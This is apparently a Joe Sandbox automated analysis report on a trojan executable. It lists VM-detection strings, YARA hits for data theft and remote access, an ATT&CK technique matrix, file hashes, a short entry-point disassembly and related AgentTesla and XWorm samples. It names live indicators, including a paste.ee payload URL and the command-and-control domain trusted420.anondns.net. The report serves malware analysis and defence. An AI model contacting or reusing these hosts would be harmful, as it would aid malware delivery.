          Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.4.drBinary or memory string: vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0.2.UmJMWJPQ9h.exe.86d290.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UmJMWJPQ9h.exe.86d290.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: UmJMWJPQ9h.exe PID: 5680, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0.2.UmJMWJPQ9h.exe.86d290.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UmJMWJPQ9h.exe.86d290.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: UmJMWJPQ9h.exe PID: 5680, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading
          1
          Process Injection
          1
          Software Packing
          OS Credential Dumping11
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Process Injection
          LSASS Memory1
          System Information Discovery
          Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading
          NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information
          LSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          UmJMWJPQ9h.exe24%ReversingLabsWin32.Trojan.Generic
          UmJMWJPQ9h.exe31%VirustotalBrowse
          UmJMWJPQ9h.exe100%AviraTR/Dropper.VB.Gen
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          trusted420.anondns.net10%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          paste.ee
          104.21.84.67
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://paste.ee/r/tC4AKfalse
              high
              trusted420.anondns.nettrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.google.comUmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://paste.ee/r/tC4AKNU6UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://paste.ee/5UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://paste.ee/r/tC4AKnsUmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com;UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                        low
                        https://paste.ee/UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://analytics.paste.ee;UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                            low
                            https://paste.ee/r/tC4AK&UNUmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://analytics.paste.eeUmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://upx.sf.netAmcache.hve.4.drfalse
                                  high
                                  https://cdnjs.cloudflare.comUmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://paste.ee/r/tC4AKntADUmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://cdnjs.cloudflare.com;UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                                        low
                                        https://secure.gravatar.comUmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://themes.googleusercontent.comUmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.21.84.67
                                            paste.eeUnited States
                                            13335CLOUDFLARENETUSfalse
                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1429292
                                            Start date and time:2024-04-21 21:12:15 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 51s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:9
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:UmJMWJPQ9h.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:c8fbdd732dfadeb0eabde5a558ee010f.exe
                                            Detection:MAL
                                            Classification:mal92.troj.evad.winEXE@2/6@1/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            TimeTypeDescription
                                            21:13:41API Interceptor1x Sleep call for process: WerFault.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            104.21.84.67Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                            • paste.ee/d/u4bvR
                                            rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                            • paste.ee/d/SDfNF
                                            Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                            • paste.ee/d/enGXm
                                            Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                            • paste.ee/d/wXm0Y
                                            SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                            • paste.ee/d/eA3FM
                                            dereac.vbeGet hashmaliciousUnknownBrowse
                                            • paste.ee/d/JZHbW
                                            P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • paste.ee/d/kmRFs
                                            comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                            • paste.ee/d/cJo7v
                                            RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • paste.ee/d/EgkAG
                                            87645345.vbsGet hashmaliciousXWormBrowse
                                            • paste.ee/d/IJGyf
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            paste.eeGPgMeqI8Gy.exeGet hashmaliciousXWormBrowse
                                            • 104.21.84.67
                                            E3XzKxHCCb.exeGet hashmaliciousXWormBrowse
                                            • 172.67.187.200
                                            SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                            • 172.67.187.200
                                            SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.187.200
                                            Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                            • 172.67.187.200
                                            eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                            • 172.67.187.200
                                            F723838674.vbsGet hashmaliciousUnknownBrowse
                                            • 104.21.84.67
                                            Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                            • 172.67.187.200
                                            F723838674.vbsGet hashmaliciousRemcosBrowse
                                            • 104.21.84.67
                                            DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                            • 104.21.84.67
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSGPgMeqI8Gy.exeGet hashmaliciousXWormBrowse
                                            • 104.21.84.67
                                            E3XzKxHCCb.exeGet hashmaliciousXWormBrowse
                                            • 172.67.187.200
                                            Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                            • 172.67.74.152
                                            SenPalia.exeGet hashmaliciousUnknownBrowse
                                            • 172.64.41.3
                                            UnderWars.exeGet hashmaliciousUnknownBrowse
                                            • 172.64.41.3
                                            Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                            • 104.26.12.205
                                            SenPalia.exeGet hashmaliciousUnknownBrowse
                                            • 172.64.41.3
                                            UnderWars.exeGet hashmaliciousUnknownBrowse
                                            • 104.21.7.115
                                            http://x-elon.fyiGet hashmaliciousGRQ ScamBrowse
                                            • 104.16.79.73
                                            2q45IEa3Ee.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                                            • 104.26.5.15
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37f463bf4616ecd445d4a1937da06e19GPgMeqI8Gy.exeGet hashmaliciousXWormBrowse
                                            • 104.21.84.67
                                            E3XzKxHCCb.exeGet hashmaliciousXWormBrowse
                                            • 104.21.84.67
                                            file.exeGet hashmaliciousVidarBrowse
                                            • 104.21.84.67
                                            SecuriteInfo.com.Win64.MalwareX-gen.20388.25803.exeGet hashmaliciousUnknownBrowse
                                            • 104.21.84.67
                                            file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                            • 104.21.84.67
                                            file.exeGet hashmaliciousVidarBrowse
                                            • 104.21.84.67
                                            SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                            • 104.21.84.67
                                            file.exeGet hashmaliciousVidarBrowse
                                            • 104.21.84.67
                                            Essay on Resolution of Korean Forced Labor Claims.vbsGet hashmaliciousUnknownBrowse
                                            • 104.21.84.67
                                            SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                            • 104.21.84.67
                                            No context
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):1.0640676086118892
                                            Encrypted:false
                                            SSDEEP:192:K2VBb9ZDV0kigMajEzOxtzuiFcZ24IO8wI0:fBb9ZykigfjptzuiFcY4IO8wI0
                                            MD5:7229B970DCDB6FCF3E5CF65369815871
                                            SHA1:6BC2F0F9004EFD676DF466E6D679415E8F066109
                                            SHA-256:C980B2ADC82907E227B69A41C719B02306A25C21163A6D6DA362304C2BCDCFF6
                                            SHA-512:5760B87C3D0CA6CAB43B70CC91913C7ACCB83558392929977500BAE60F622B6A3EB3B630BD487FA43428B5111276ED27C2AD5A3DCBE3EDE331376D3993343707
                                            Malicious:false
                                            Reputation:low
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.2.0.0.3.9.6.7.3.3.3.4.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.2.0.0.3.9.8.3.8.9.6.0.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.a.9.b.d.9.0.-.9.6.7.b.-.4.0.d.1.-.9.f.a.7.-.3.2.4.2.8.1.6.9.9.1.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.d.1.2.7.b.5.-.f.b.e.a.-.4.e.d.3.-.8.6.2.0.-.8.f.7.7.4.e.3.b.f.c.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.m.J.M.W.J.P.Q.9.h...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.a.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.3.0.-.0.0.0.1.-.0.0.1.4.-.f.0.1.b.-.f.8.f.0.1.f.9.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.d.a.f.9.4.c.8.4.7.e.1.5.0.b.e.6.6.e.2.e.3.8.c.4.0.3.3.0.6.0.0.0.0.0.9.0.4.!.0.0.0.0.2.1.0.e.3.0.0.6.3.9.6.0.3.8.0.c.3.d.8.c.d.9.8.e.3.3.d.c.5.d.d.b.1.7.4.b.8.d.1.1.
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Mini DuMP crash report, 14 streams, Sun Apr 21 19:13:17 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):127648
                                            Entropy (8bit):2.358680225719199
                                            Encrypted:false
                                            SSDEEP:768:gzXaQ6oMz143SnvCQIQaokyyHzhxBK/p+8ncOIkyr1oF80DUmG6:gC14sZIQaoktTjBK/pnc5Pr1gxj
                                            MD5:B27A051E2C46E875E2B53C3C9A2D0095
                                            SHA1:EB77FE1BBE832B722A0BF8FA9E8C96271709CBC4
                                            SHA-256:FA15E570154E2414687F4C2C479B7B94164E0FFF51546E996EFE2662633152D3
                                            SHA-512:B3B7C059714B995503448ADB90E446556C8E5EDCA0AAFF12C0E1A840999B42F99DFD365481EC287463C755C88D8A7CF847AB82AC8B1B520D1FB9A59BA29C62ED
                                            Malicious:false
                                            Reputation:low
                                            Preview:MDMP..a..... .......Me%f....................................T....M..........T.......8...........T............N...............$...........&..............................................................................eJ......L'......GenuineIntel............T.......0...Be%f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8406
                                            Entropy (8bit):3.70940918689722
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJ4t6I6YEIPSU95P1EgmfDX4bbpDa89bC5sf3V92m:R6lXJq6I6YEASU9BmgmfLmCSflV
                                            MD5:70AF88ABB62E244458C774490C5C542B
                                            SHA1:4C5359D873FA9B8D9883B87B0AE82DB86A22A012
                                            SHA-256:C860B1CAA8FCA112B94A14C8E379B385C61DA24A63A2210E9AC2BFA39769569E
                                            SHA-512:DD2875D21642F7F487B52C83F09C8A8EC9B5CE64E24CA149B63BE7C7C23C673E88438E1A341DDAC1964B77083F7035BA40E0BF984897EAC25BDBB0183AC6DD90
                                            Malicious:false
                                            Reputation:low
                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.8.0.<./.P.i.
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4704
                                            Entropy (8bit):4.526326564861639
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zsZJg77aI9PUWpW8VYOZYm8M4JreQOqFl+q8mjXORKxBRjXd:uIjfrI7lN7VwJrvB9L+sBtXd
                                            MD5:29E307ECE82694F390C424EB690AF208
                                            SHA1:F4A76C69DED6DA5D8993317B54CAD1476BAF668C
                                            SHA-256:BFCEC4C34F6BE2CDA80559C777DB3B0C36B5F3203204EDE2377A8D8C39927E99
                                            SHA-512:E64A71A1630507B66B17990AB32F7A1F944A7F8A5F98393855CE1A018A06B4CBF432EB783E61A455E480268AE8AC2CB8466A9535D16311D880E2DCD1A9E43713
                                            Malicious:false
                                            Reputation:low
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="290055" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                            Process:C:\Users\user\Desktop\UmJMWJPQ9h.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):589824
                                            Entropy (8bit):2.4309587446620924
                                            Encrypted:false
                                            SSDEEP:6144:t86wCpCfyFeIeSrMMSAtHX0M1YBRoJ/iRrefffI5:t8PCpCfyF1
                                            MD5:E0B8C91D2A1312F1A5F64C488F9F9D27
                                            SHA1:751AB6CB79AF075433414701B435A25C6BB0FE94
                                            SHA-256:1D2987A8B152EC69A9AB08BAF5AE48BFD4EF8218BAE2CB1CB921FFCD7AD733BB
                                            SHA-512:3343B7AC057DB9FB623EC1229B96DE67FA7003CF80D4438DCE0A4CC7075BBD7A87EA8EE7F3E6BFA09A94B06CDCA6EC445018DE028E192E21A809F08F073A6BCB
                                            Malicious:false
                                            Reputation:low
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.421972981050898
                                            Encrypted:false
                                            SSDEEP:6144:OSvfpi6ceLP/9skLmb0OT5WSPHaJG8nAgeMZMMhA2fX4WABlEnNy0uhiTw:tvloT5W+EZMM6DFyM03w
                                            MD5:862107F4B499E71940D972917BE832B5
                                            SHA1:858636E9E23483FB3E540D4BE27F47E3DD207EDD
                                            SHA-256:6154DB8CCAC99C134945CDDA178349D07D6D940027869F45DA2E67907AA006F0
                                            SHA-512:45E86455C34D205CDCB5B3328BD12A9FC3C82359FDEFC6068FC4AF86961C192A536752F18BB1079313FB54BADC82C47D368185D7A4478E04D6D04D7A04119A56
                                            Malicious:false
                                            Reputation:low
                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):3.3934155129003245
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.15%
                                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:UmJMWJPQ9h.exe
                                            File size:3'162'112 bytes
                                            MD5:c8fbdd732dfadeb0eabde5a558ee010f
                                            SHA1:210e30063960380c3d8cd98e33dc5ddb174b8d11
                                            SHA256:eb9813c264d7fa7b04eeeddbff3c011c23f279dab97bc072e4aeb021f1be6544
                                            SHA512:e5ba44f512f29244f7d7704174a144600b5d978bacf7b2beae8b269892f52db706759e7de409237aa4dfb10d9434bbce46e48b581ce5ca9dbc42bce685d370c5
                                            SSDEEP:12288:lY8PCpCfyF1PeDEAX3jekDqEUO8IrO69ZKY2z+UD8PCpCfyF1c:lo94EO3jekDpkz+Oi
                                            TLSH:88E5C55320104C27E07AD7343F24C72CAFC43E9DA6A978FE67C5BE26BB369818951E15
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`...............................'......Rich....................PE..L....|.e..................&...................&...@........
                                            Icon Hash:1b676733391d2531
                                            Entrypoint:0x4016e8
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:
                                            Time Stamp:0x65BE7CDF [Sat Feb 3 17:50:23 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b6bd2c758fd2124a56e081f0b8cb2b0c
                                            Instruction
                                            push 0061FB34h
                                            call 00007FA2D5422993h
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            xor byte ptr [eax], al
                                            add byte ptr [eax], al
                                            dec eax
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [ebx+46h], bl
                                            pop edx
                                            scasd
                                            and al, E4h
                                            and byte ptr [ebp-57h], al
                                            jmp 00007FA353EE293Ch
                                            adc ebp, dword ptr [ebx]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add dword ptr [eax], eax
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            dec ebx
                                            inc ebp
                                            js 00007FA2D54229EEh
                                            inc edi
                                            jne 00007FA2D54229D3h
                                            xor dword ptr [ecx+36h], esi
